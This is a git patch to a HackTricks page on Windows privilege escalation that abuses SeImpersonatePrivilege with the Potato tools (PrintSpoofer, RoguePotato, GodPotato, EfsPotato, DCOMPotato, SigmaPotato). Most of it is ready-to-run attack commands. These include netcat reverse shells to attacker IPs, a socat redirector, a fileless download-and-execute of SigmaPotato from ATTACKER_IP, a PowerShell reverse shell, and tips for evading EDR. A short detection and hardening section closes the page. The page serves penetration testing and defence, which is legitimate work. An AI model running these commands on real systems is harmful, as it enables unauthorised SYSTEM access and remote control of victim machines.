From e3c5f26a1a2c899eeb067c442e18571da1e20efb Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 27 Aug 2025 01:29:39 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/windows-hardening/windows-loca... --- .../roguepotato-and-printspoofer.md | 96 ++++++++++++++++++- 1 file changed, 93 insertions(+), 3 deletions(-) diff --git a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index a6efedddc..b74dd2801 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -4,6 +4,42 @@ > [!WARNING] > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. +> Note: A modern alternative frequently maintained in 2024–2025 is SigmaPotato (a fork of GodPotato) which adds in-memory/.NET reflection usage and extended OS support. See quick usage below and the repo in References. + +Related pages for background and manual techniques: + +{{#ref}} +seimpersonate-from-high-to-system.md +{{#endref}} + +{{#ref}} +from-high-integrity-to-system-with-name-pipes.md +{{#endref}} + +{{#ref}} +privilege-escalation-abusing-tokens.md +{{#endref}} + +## Requirements and common gotchas + +All the following techniques rely on abusing an impersonation-capable privileged service from a context holding either of these privileges: + +- SeImpersonatePrivilege (most common) or SeAssignPrimaryTokenPrivilege +- High integrity is not required if the token already has SeImpersonatePrivilege (typical for many service accounts such as IIS AppPool, MSSQL, etc.) + +Check privileges quickly: + +```cmd +whoami /priv | findstr /i impersonate +``` + +Operational notes: + +- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato. +- RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag. +- EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon). +- Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; try a different pipe/transport or ensure the target service is running. + ## Quick Demo ### PrintSpoofer @@ -23,6 +59,10 @@ NULL ``` +Notes: +- You can use -i to spawn an interactive process in the current console, or -c to run a one-liner. +- Requires Spooler service. If disabled, this will fail. + ### RoguePotato ```bash @@ -31,6 +71,16 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999 ``` +If outbound 135 is blocked, pivot the OXID resolver via socat on your redirector: + +```bash +# On attacker redirector (must listen on TCP/135 and forward to victim:9999) +socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999 + +# On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP +RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999 +``` + ### SharpEfsPotato ```bash @@ -71,6 +121,13 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su nt authority\system ``` +Tip: If one pipe fails or EDR blocks it, try the other supported pipes: + +```text +EfsPotato [pipe] + pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc) +``` + ### GodPotato ```bash @@ -79,10 +136,44 @@ nt authority\system > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` +Notes: +- Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present. + ### DCOMPotato ![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa) +DCOMPotato provides two variants targeting service DCOM objects that default to RPC_C_IMP_LEVEL_IMPERSONATE. Build or use the provided binaries and run your command: + +```cmd +# PrinterNotify variant +PrinterNotifyPotato.exe "cmd /c whoami" + +# McpManagementService variant (Server 2022 also) +McpManagementPotato.exe "cmd /c whoami" +``` + +### SigmaPotato (updated GodPotato fork) + +SigmaPotato adds modern niceties like in-memory execution via .NET reflection and a PowerShell reverse shell helper. + +```powershell +# Load and execute from memory (no disk touch) +[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe")) +[SigmaPotato]::Main("cmd /c whoami") + +# Or ask it to spawn a PS reverse shell +[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444")) +``` + +## Detection and hardening notes + +- Monitor for processes creating named pipes and immediately calling token-duplication APIs followed by CreateProcessAsUser/CreateProcessWithTokenW. Sysmon can surface useful telemetry: Event ID 1 (process creation), 17/18 (named pipe created/connected), and command lines spawning child processes as SYSTEM. +- Spooler hardening: Disabling the Print Spooler service on servers where it isn’t needed prevents PrintSpoofer-style local coercions via spoolss. +- Service account hardening: Minimize assignment of SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege to custom services. Consider running services under virtual accounts with least privileges required and isolating them with service SID and write-restricted tokens when possible. +- Network controls: Blocking outbound TCP/135 or restricting RPC endpoint mapper traffic can break RoguePotato unless an internal redirector is available. +- EDR/AV: All of these tools are widely signatured. Recompiling from source, renaming symbols/strings, or using in-memory execution can reduce detection but won’t defeat solid behavioral detections. + ## References - [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) @@ -92,8 +183,7 @@ nt authority\system - [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) - [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) - [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) +- [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato) +- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/) {{#include ../../banners/hacktricks-training.md}} - - -